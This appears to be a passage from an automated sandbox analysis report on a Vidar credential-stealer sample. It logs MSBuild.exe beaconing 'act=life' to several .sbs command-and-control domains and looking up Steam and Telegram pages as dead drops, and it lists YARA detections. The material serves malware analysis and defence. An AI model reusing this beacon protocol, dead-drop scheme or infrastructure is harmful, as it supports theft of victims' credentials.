2024-10-08 18:47:18 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 08 Oct 2024 18:47:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12409 Connection: close Set-Cookie: stel_ssid=40fc42848f98d1d996_16616468765238837468; expires=Wed, 09 Oct 2024 18:47:18 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-10-08 18:47:18 UTC	12409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 61 73 6c 65 6e 67 64 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @maslengdsa</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49886	188.114.96.3	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:42 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawwyobstacw.sbs
2024-10-08 18:47:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:42 UTC	803	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kahuf885i7j7tqphuud93nsn03; expires=Sat, 01 Feb 2025 12:34:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iKezaABi%2F9L8y4Eje7iSNviwLq%2B7II7p11vh9%2FOkt3hBbv9nh7h6%2BtUNuunoQ9yzz2YnauCZ8R2Sj%2BWuVL7GnbZZOUtGz4OVbR%2Binr40tyg9ddtlKeawOPYU4CfhQlNtUPFOOA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d0aed0c7271-EWR
2024-10-08 18:47:42 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49894	188.114.96.3	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:43 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mathcucom.sbs
2024-10-08 18:47:43 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:43 UTC	766	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rl87fb6lq1u1rl0lmgkr2p20mm; expires=Sat, 01 Feb 2025 12:34:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6hnaLhLV9WgINPz75QZKSW90nwGMcuoPcPTYuoeqQhx97iSI7ypecZTdY%2F%2BtBUtD8XiLfDeEK5pyHvX%2Bl1BJG7aisZwoA%2FQNLAeTVoDyiRbnjgV%2FrqvTn0tNwTJY6W9j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d116a7f0cbd-EWR
2024-10-08 18:47:43 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49902	188.114.97.3	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:44 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: allocatinow.sbs
2024-10-08 18:47:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:45 UTC	795	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=680v1ha4hr933j50oh7rvtj36s; expires=Sat, 01 Feb 2025 12:34:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uW%2B%2FoNnCoXJGkJYYeFULG%2Bi7Ttk8FPXgSPIUEhNEkb738J43zPuN9ksJ6F2M0qyXUC1mi8x2RbuNmnHpazNYfHwgD%2Fu6dNV1xgszLrAhVuqXHIfdOfssC%2BqceYutpSQZ3B0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d18bb757d18-EWR
2024-10-08 18:47:45 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49911	104.21.33.249	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:45 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enlargkiw.sbs
2024-10-08 18:47:45 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:46 UTC	781	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v7975ucfkfbd0hpohrvtv4geeo; expires=Sat, 01 Feb 2025 12:34:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKvDUz4kNxI79KOaDprQxxypRBBUAGfAnrJVhERi4JaNka3KcSFuORCdS3FsRmIrDTVsLPhsUZW2op46t2RhQK6wT0eE%2F3iKLtZGOaYe27PbV0hnao3HHmC50RkZ0ir9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d1f6d3bc44a-EWR
2024-10-08 18:47:46 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49917	172.67.205.156	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:46 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resinedyw.sbs
2024-10-08 18:47:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:47 UTC	787	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qpqgdvdl8djkhl4dcg70futpsb; expires=Sat, 01 Feb 2025 12:34:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SChD%2FozGndSACCO7RHyInwdYUtaemHjBqmXc7mq3qP3Fge7YUPLhBr5G8GF5uXUK1g3VaGWFfo3NFqef%2F%2F9AiG3o%2B1ltoge8QUqsWNL6CTobAQtECwJqrhOSO0GQVPnG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d268c3442cd-EWR
2024-10-08 18:47:47 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49923	172.67.140.193	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:48 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vennurviot.sbs
2024-10-08 18:47:48 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:48 UTC	770	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=peb7ti1vd05rphj49tqv1tlpm4; expires=Sat, 01 Feb 2025 12:34:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bOImcZad9qRNklwlugFb%2BfDLPDimDx11zv2hEuMHKCx4a2VVVza9JFJ8E81pOEPv2%2Bu4vm5uumoN8MrTW3QneFTgfNpwfNuEJpKoTuvCFxDNOGyd%2F97cYDgXrZVE3UcTsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d2e6c034402-EWR
2024-10-08 18:47:48 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49936	104.21.79.35	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:49 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condifendteu.sbs
2024-10-08 18:47:49 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:50 UTC	793	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ljhk9ji055t906f8se6u0gqbbm; expires=Sat, 01 Feb 2025 12:34:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tyfkvMECBZDzNvjgA%2B5t5mLIY0GcE7GZV0ERdhWCcwtrPWf1KjITOSKXULn4KW3xt%2FpickZ07WWXfGgpJtDOytx4dIoDYPNKC%2B6ZtbY72u%2FZSO8LM%2FE6OQDAzJ4eYKSKLBAv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d375eea41f9-EWR
2024-10-08 18:47:50 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49942	188.114.96.3	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:50 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawwyobstacw.sbs
2024-10-08 18:47:50 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:51 UTC	803	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=aggs2bjn71jtmc9ppplf2288v1; expires=Sat, 01 Feb 2025 12:34:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwItcJ5ZCml0K%2F32HnV6LWQDccGKwczFUEutSleHNe1%2BJxziA66FsIU%2Bmyqq%2F5kEH67qWrmRYOXKAkF6oWreDK2NuWe05lH6l5FbkGpddqfXw%2FOe0PyAUM6xeBLcEcaNnjkd%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d3dbd833350-EWR
2024-10-08 18:47:51 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49948	104.102.49.254	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:51 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-08 18:47:52 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 08 Oct 2024 18:47:52 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=92aa9a19f44525ac3ba35650; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-08 18:47:52 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-08 18:47:52 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-08 18:47:52 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-08 18:47:52 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49957	172.67.206.204	443	5680	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:47:52 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-08 18:47:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-08 18:47:53 UTC	797	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:47:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6na04317gmof5v8gnujpfll2n9; expires=Sat, 01 Feb 2025 12:34:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rxIaGMu157uANONy9abLj3JoB0S%2FUtB4XXRfvyxfmHtt5T78A%2BGZ3JSTPfq70lv%2BKAm3D5UMxqZDnSxgVGCfA1fcbQVystAv9sTlfdS1bSs7hZQ3WhYsEs7rvP1veh2hrOMwMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf84d4c1840236b-EWR
2024-10-08 18:47:53 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-08 18:47:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:46:53
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe"
Imagebase:	0xc40000
File size:	612'944 bytes
MD5 hash:	AF5BFAA4908459155ADE24245AAB4A1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:46:53
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x1f0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:46:53
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xf00000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:46:54
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 304
